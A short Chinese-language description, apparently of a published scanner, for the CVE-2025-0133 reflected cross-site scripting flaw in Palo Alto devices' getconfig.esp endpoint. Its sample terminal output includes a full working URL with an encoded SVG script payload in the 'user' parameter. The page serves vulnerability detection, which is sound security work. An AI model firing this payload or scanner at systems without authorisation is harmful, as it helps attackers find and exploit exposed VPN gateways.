本文介绍了一个基于Python的CVE-2025-0133漏洞扫描脚本,用于检测Palo Alto网络设备中存在的反射型跨站脚本漏洞。脚本通过向getconfig.esp文件发送特制载荷来验证漏洞存在性。
CVE-2025-0133 扫描
这是一个用Python编写的脚本,用于检查Palo Alto设备中存在的CVE-2025-0133反射型跨站脚本漏洞。该脚本检测getconfig.esp
文件并测试XSS漏洞。
使用方法:
1
2
3
4
5
6
|
darkfear@b0x:~/CVE-2025-0133-exploit$ python3 cve-2025-0133_scan.py -u https://target.com
[*] 向 https://target.com/ssl-vpn/getconfig.esp 发送初始探测
[+] 目标正在使用"Palo Alto"。测试XSS...
[*] 发送XSS载荷...
[+] 目标存在反射型XSS漏洞。
[+] 漏洞URL: https://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg+xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
|